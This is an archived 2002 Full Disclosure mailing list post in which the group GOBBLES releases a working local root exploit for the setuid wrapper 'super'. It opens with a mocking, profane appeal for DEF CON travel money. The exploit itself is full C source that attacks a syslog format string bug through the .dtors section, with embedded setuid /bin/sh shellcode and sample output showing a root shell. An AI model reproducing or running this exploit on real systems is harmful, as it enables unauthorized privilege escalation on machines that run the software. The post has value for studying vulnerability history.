Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

The SUPER Bug
From: full-disclosure () lists netsys com (full-disclosure () lists netsys com)
Date: Wed, 31 Jul 2002 07:03:11 -0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Apologies to this list.  You won't be forgotten in the future.

/*
 * SAVE DEFCON..HELP GOBBLES..SAVE DEFCON..HELP GOBBLES
 *
 * When GOBBLES say he and he security team
 * are non-profit. He really mean NON-profit.
 * This means GOBBLES and he GOBBLES Security
 * Labs (GSL) friends do not have much funds.
 *
 * GOBBLES was hoping to receive the money
 * for speaking at the defcon gathering of
 * security enthusiasts up front. So he could buy
 * and pay for he ticket to Las Vegas from the great city
 * of Baltimore where he currently resides.
 *
 * GOBBLES is not selling out.  GOBBLES is just admitting that he
 * need your help.  Please, help GOBBLES!
 *
 * After many e-mails to defcon organisers it became
 * apparent to GOBBLES this was not going to happen.
 * This mean GOBBLES has no way of getting to defcon.
 * This also mean GOBBLES cannot deliver he talk that
 * are named "Wolves among us". Alot of time and work
 * went into the preperation of this talk and it was
 * to be the grand finale of the year of the turkey
 * (2002). With many new 0-day to give out and many
 * great anouncements to be made.
 *
 * Thanks to Jeff Moss (dt () defcon org, jmoss () blackhat com)
 * you, the defcon attendee, may very well get cheated out
 * of attending one of the most provocative and daring
 * events defcon history has ever seen.
 *
 *      !!! ITS NOT TOO LATE..BUT HURRY !!!
 *
 * Help GOBBLES go to defcon. GOBBLES give so much to
 * the community..is it not time the community now help
 * a poverty stricken turkey to spread his wings and fly
 * towards fame and glory?
 *
 * Reasons why you should help GOBBLES get to defcon:
 *
 * -- Paying for GOBBLES plane ticket to Vegas is better than spending $300 on a stripper
 *
 * -- Seeing GOBBLES present naked: Priceless.
 *
 * -- Zeroday (possible hardcover) GOBBLES comic
 *
 * -- A chance to buy GOBBLES art
 *
 * -- A chance to receive _free_ GOBBLES T-shirts
 *
 * -- Copies of those exploits you couldn't code
 *
 *
 * What does GOBBLES need?
 *
 * Basically GOBBLES need to round up 300 US dollars before saturday.
 * "Wolves among us" is sheduled for the last day of defcon.
 * Namely 3PM on Sunday August 4th. As you can very well imagine
 * this talk was going to blow the lid off of more dirty secrets
 * than there are noodles in China. With your help GOBBLES can still
 * make this happen. So what GOBBLES is asking for is a little helping
 * hand from the community. If anyone has the funds to sponsor GOBBLES
 * to come to defcon please contact GOBBBLES at GOBBLES () hushmail com 
 *
 *     !!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!!
 *
 * GOBBLES accepts Western Union payments.  GOBBLES will not accept anything
 * beyond the amount needed for travel to Vegas and back.  GOBBLES is not
 * selling out, GOBBLES is asking help from those penetrators and researchers
 * that GOBBLES helps every day.
 *
 * In other news, ISS rejected GOBBLES request for a job application.  It
 * seems that they're afraid of getting scalp'd.
 *
 *                           Political statement:
 * HALT THE SNOSOFT ABUSE OF 14 YEAR OLDS. MAKING CHILDREN SLAVE OVER 3 LINE
 * PERL EXPLOITS FOR LESS THAN MINIMUM WAGE IS NOT VERY ETHICAL !!!
 *
 * FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN
 * JAIL W00W00 JAIL W00W00 JAIL W000W0 JAIL W00W00 JAIL W00W00 JAIL W00W00
 * FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM
 */

/*
 * GOBBLES-own-super.c
 *  -- root exploit for root hole in root wrapper
 *
 * Super is sudo wannabe that boasts much security.
 * GOBBLES think people who write setuid wrappers
 * should learn to program securely before opening
 * big hoohoo about how secure program is.
 *
 * Current super version (3.18):
   -- ftp://ftp.ucolick.org/pub/users/will/
 *
 * Super maintainer say following about he code:
 *
 * "Super allows an admin to control access to files
 *  and functions for users. It is similar to sudo, but
 *  uses a different approach in the configuration file."
 *
 * Problem:
 *
 * When super is compiled to use syslog(3) for its logging
 * of error messages the following lines makes pre-auth
 * local root exploitation rather trivial:
 *
 * From error.c
 * ...
 * #define SysLog(pri, buf) syslog((pri), (buf))
 * ...
 * SysLog(error_priority, buf);
 * ...
 *
 * This means users that are not in the super config file
 * will be able to execute code with root priviledges.
 *
 * "Super acts as a SetUID wrapper around system commands
 *  to make sure the commands are executed safely, and
 *  only by authorized users."
 *
 *              hehehe ;PPpPPPPp
 *
 * Love,
 * GOBBLES
 * GOBBLES () hushmail com
 *
 * Official site: http://www.bugtraq.org
 * Official mirror: http://www.immunitysec.com/GOBBLES/
 */

/* Proof Of Concept:

$ gcc GOBBLES-own-super.c -o GOBBLES-own-super
$ ./GOBBLES-own-super

Usage:
./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ]

$ objdump -s -j .dtors /usr/local/bin/super

/usr/local/bin/super:     file format elf32-i386

Contents of section .dtors:
 8063f7c ffffffff 00000000                    ........

$ ./GOBBLES-own-super -t 0x8063f7c
. target @ 0x8063f80
. shellcode @ 0xbfffffb0
. username: 9 bytes
super: No such super command as `xx??%.49103x%29$hn%.16305x%30$hn'.
sh-2.05#

*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>

#define ALLIGN          2
#define DPA             29

#define SUPER           "/usr/local/bin/super"

void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);

extern char **environ;
char string[256];

int
main(int argc, char **argv)
{
        unsigned long t, w;
        int dpa, allign, shift = 0;
        char c, *store;

        if(argc == 1) {
                fprintf(stderr, "\nUsage: \n%s -t <.dtors address> [ -o <offset> -A <allignment> ]\n", argv[0]);
                exit(0);
        }

        allign = ALLIGN;
        dpa = DPA;

        while((c = getopt(argc, argv, "t:o:A:")) != EOF) {
                switch(c) {
                        case 't':
                                sscanf(optarg, "%p", &store);
                                t = (long)store;
                                t += 4;
                                break;
                        case 'o':
                                dpa = atoi(optarg);
                                break;
                        case 'A':
                                allign = atoi(optarg);
                                break;
                        default:
                                fprintf(stderr, "hehehe ;PPppPPPp\n");
                                exit(0);
                }
        }

        store = NULL;

        if((store = getenv("GOBBLES")) == NULL) {
                stuff();
                if(execve(argv[0], argv, environ)) {
                        fprintf(stderr, ". problem re-executing\n");
                        exit(1);
                }
        }

        w = (long)store;
        // shift is signed so this works both ways
        shift = (strlen(argv[0]) - strlen(SUPER));
        w += shift;

        fprintf(stderr, ". target @ %p\n. shellcode @ %p\n", t, w);

        buildstring(t, w, dpa, allign);

        if(execl(SUPER, "super", string, NULL)) {
                fprintf(stderr, "error executing\n");
                exit(1);
        }
}

void
buildstring(unsigned long t, unsigned long w, int dpa, int allign)
{
        unsigned int un, deux, x, b[4], namelen;
        char a_buf[4];
        struct passwd *pass;

        memset(string, '\0', sizeof(string));
        memset(a_buf, '\0', sizeof(a_buf));

        if((pass = getpwuid(getuid())) == NULL) {
                fprintf(stderr, ". can't find your username\n");
                exit(1);
        }

        namelen = strlen(pass->pw_name);

        fprintf(stderr, ". username: %d bytes\n", namelen);

        for(x = 0; x < allign && x < sizeof(a_buf); x++)
                a_buf[x] = 'x';

        b[0] = (t & 0x000000ff);
        b[1] = (t & 0x0000ff00) >> 8;
        b[2] = (t & 0x00ff0000) >> 16;
        b[3] = (t & 0xff000000) >> 24;

        un = (w >> 16) & 0xffff;
        deux = w & 0xffff;

        if(un < deux) {
                snprintf(string, sizeof(string)-1,
                        "%s"
                        "%c%c%c%c%c%c%c%c"
                        "%%.%hdx" "%%%d$hn"
                        "%%.%hdx" "%%%d$hn",
                        a_buf,
                        b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],
                        un - (8 + allign + 29 + namelen),
                        dpa, deux - un, dpa + 1

                );
        }
        else {
                snprintf(string, sizeof(string)-1,
                        "%s"
                        "%c%c%c%c%c%c%c%c"
                        "%%.%hdx" "%%%d$hn"
                        "%%.%hdx" "%%%d$hn",
                        a_buf,
                        b[0], b[1], b[2], b[3], b[0] + 2, b[1], b[2], b[3],
                        deux - (8 + allign + 29 + namelen),
                        dpa, un-deux, dpa + 1

                );
        }
}

void
stuff(void)
{
        char code[] = // the setuid 0 with the execve of the /bin/sh
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
        "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
        "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
        setenv("GOBBLES", code, 1);
}

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAj1H7cIVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAP4YYA
njnq2IvxHZHXibibOUzq83XUnKWaAKCQ91rP+cmxZICuMwkBb9nYnpEibA==
=nUic
-----END PGP SIGNATURE-----



  By Date           By Thread  

Current thread:
  • The SUPER Bug full-disclosure () lists netsys com (Jul 31)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault